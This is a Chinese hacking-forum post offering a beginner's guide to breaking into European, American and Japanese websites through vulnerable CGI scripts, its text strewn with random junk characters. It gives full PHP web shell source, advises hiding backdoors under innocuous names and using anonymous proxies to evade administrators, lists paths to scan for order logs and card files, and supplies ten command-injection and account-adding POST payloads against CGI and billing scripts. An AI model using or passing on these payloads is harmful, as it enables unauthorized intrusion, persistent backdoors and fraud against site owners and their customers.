CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
, f" R( e6 E* r) |0 p大家好 我是bboyhip  只是一名菜菜的exploiter
- r  h" m) s& m1 x( e1 O- g- H很开心来到贵论坛
8 G4 |! s2 H! Y% v  T这里让我感觉 很有技术交流的感觉
我会长长来玩的
前言:
" b$ R' T: s4 W" {以下讲解针对欧美日本网站
2 K2 i' S8 e0 Q( }: \當我們在做滲透分析的時候 方法有很多
我门都知道 国外伺服器大多是linux 平台
0 ]( S3 j  t: M: l2 L* s7 L6 Y所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/
" V) R3 O+ e9 D
7 U2 h4 v! s9 x9 B% G/ f只是个人在实务上一些经验
+ A- }% G1 s* h写的不好 请多多见谅喔
; Y' T9 {* @6 `: y9 G6 }+ I在这里我简单分为几个部份一定要會的
) W+ r. s7 T" o2 W2 B1 {: k4 h讲解一下
& R  L0 K9 Q. ]' s" ^让没有基础的人很容易上手
" \- ^2 U1 c/ n6 Y% @7 @  g; J) \% w
以下内容跟帖回复才能看到
7 I! E' `8 f! G& ]% J0 T6 Z# Q==============================
5 ?$ i1 j% a  b( a( Y
第1部份: 何谓Shell?
3 t  M) n( t9 x1 P  G" g% F: mShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
+ ]8 `% m, }- Y3 h9 w; f$ wA shell is the program which reads user input from the command line and executes actions based upon that input.
# X& q% ^' q& x8 p8 b' z1 D意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
, w5 d1 y: _* R, i) B5 Z/ l要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
. {. ~: Y' N; F所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.
4 ]. R/ F5 ]- Q( w% ^. k. w+ y3 o& H
  w  c0 l6 v7 P% d4 S5 G# z第2部份: Unix 指令
" c3 H) Y5 B' Z+ u& h2 b以下是一些常见及重要的指令:
' v* t+ i; X' U$ w: apwd: 显示当前目录, 即是後门/程式所在的位置
6 ?" b, j; `, B" b! U3 e如 /home/www/site.com/cgi-bin/
- }( g- x; L% T8 b2 A( sls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
7 o: m: {2 g$ m/ d) Y- b( E# fls -al :详细列出档案资料(当前目录)
$ U7 U% @; R9 c1 H8 x- ]ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
cat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
cat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
man: 显示指令用法  
man ls: 显示ls这指令的用法  
" @7 b  A& [* [$ e& Smkdir 建立目录
0 H$ l( F$ X1 M( S2 x, m' h1 k# ^) zrmdir 删除目录
mv 移动档案
, V! ]  ~8 E" D8 X, a. w6 E; Zrm 删除档案

, f( @) }: E8 U! C7 L第3部份: Shell的使用
例如:
http://site.com/refer.php
这是我的後门, 原代码如下:
! G# p  S- t0 I7 m<Form Action="#" Method="POST">
+ H1 K, [( I3 N# m<Input type="text" name="cmd">
5 D+ O0 Z" ]. |0 y4 w2 J9 q) `<Input type="Submit">
</Form>
<?php
$cmd = $_POST['cmd'];
$Output = shell_exec($cmd);
$ z0 e$ B- \# i; t4 g# _* {echo $Output;
, s8 h& I0 z3 Q) @$ Z& Y9 I. O6 y?>
输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
; r/ _: E9 F# Q: q6 P& S7 Z; e
2 J3 l( n' Y5 q: o- W第4部份: 注意事项
- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
7 T5 g0 m9 P1 j9 D' S, h0 z- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
不容易被发现.
2 v/ V4 p# o. A- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
5 N; L3 P' |( ~! i2 @7 ?开始讲解脚本入侵过程:
: ~( H) b& U: y在这里提供一些方法思路让大家学习一下

1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
) L8 B0 k9 E; E扫洞工具 如:triton..等等
E表
' e9 C# q5 @: g( l$ P如
/cgi-bin/add-passwd.cgi
" y  m1 V, a8 v0 m/WebShop/templates/cc.txt
4 W2 O) k% h$ k+ W1 M/Admin_files/order.log
9 i( b2 y' O( l# d7 {/orders/mountain.cfg
/cgi-sys/cart.pl
5 S& Z, O& C, \4 M& }+ m/scripts/cart.pl
/htbin/cart.pl
' |( \: [& n; G" F- C2 J( DE表来源可以是网路收寻或是自己的0 day
: ]4 U; Y" G3 K
. h) B) H- T# G* F+ A) O2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
* O' j) V, h3 ^- h# G) qERROR:This script should be referenced with a METHOD of POST.
( I/ b. ]1 l& N$ c) ?2 ]没有返回一定是假的
% r8 t* B$ S* e. W3.重来来了 很多人都会问我
( S& \% @$ h/ L9 C* D8 E* G( ]! a他扫到很多洞 但是不会使用
4 U; W# {3 X( ~5 k) U- s1 |# t因为这些漏洞 使用的语法 称为post
- H8 b! A: i5 U+ C7 _$ P( s" l$ i我们要找post 的方法很多
可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等

以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
6 h8 S* f$ g& k  h( u+ W, x/index.cgi
8 a$ s: S- n& \! t$ M6 xwei=ren&gen=command
/passmaster.cgi
Action=Add&Username=Username&Password=Password
/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
/form.cgi
; E. n  s$ \/ ~/ vname=xxxx&email=email&subject=xxxx&response=|echo;ls|
; O$ K' R% \1 J8 h* U% q/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
! z- a) A9 ~: Uuser=username&pass=Password&confirm=Password
/ccbill-local.asp
& u, \9 i& `! `0 ?3 fpost_values=username:password
7 s4 E! [: D8 W* |0 i$ f4 H" A/count.cgi
pinfile=|echo;ls -la;exit|
( L7 h. |! D. k1 j8 D( w/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
6 E( W( z# ~+ `$ s" S. b: N" R" h6 Q/verotelrum.pl
. R' s- _- r$ |7 \* I& a) _vercode=username:password:dseegsow:add:amount<&30>
1 C: l- }8 M8 Z! I+ K" F  ?/af.cgi_browser_out=|echo;ls -la;exit;|

今天就讲到这  感谢大家支持